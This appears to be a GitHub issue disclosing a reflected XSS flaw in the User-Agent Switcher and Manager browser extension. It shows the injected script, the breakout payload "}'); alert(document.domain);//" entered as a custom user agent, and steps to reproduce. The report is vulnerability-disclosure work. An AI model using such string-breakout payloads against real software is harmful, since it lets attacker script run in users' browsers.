Reflected Cross-Site Scripting (XSS)

Open stevesec opened this issue 3 years ago • 0 comments

Hi there,

I was able to perform a Cross-Site Scripting attack using the User-Agent Switcher and Manager on Chrome build 105.0.5. This persisted across the browser until the User-Agent was removed

document.currentScript.dataset.injected = true;
            const o = JSON.parse('{"userAgent":""}'); alert(document.domain);// const o=JSON.parse('{"userAgent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36","appVersion":""}'); alert(document.domain);","platform":"","vendor":"Google Inc.","product":"","oscpu":"[delete]","buildID":"[delete]","productSub":"20030107"}');

            for (const key of Object.keys(o)) {
              if (o[key] === '[delete]') {
                delete Object.getPrototypeOf(window.navigator)[key];
              }
              else {
                navigator.__defineGetter__(key, () => {
                  if (o[key] === 'empty') {
                    return '';
                  }
                  return o[key];
                });
              }
            }
          }

chrome_debugger_xss

I was able to insert "}'); alert(document.domain);// into the User-Agent Switcher and Manager and return a JavaScript alert box. This was tested on Firefox as well and succeeded.

Steps to reproduce:

Download User-Agent Switcher and Manager
Enter in custom User-Agent - "}'); alert(document.domain);//
Note the JavaScript alert box

Please let me know if I can do anything to help in this situation. Thank you!

Sep 06 '22 19:09 stevesec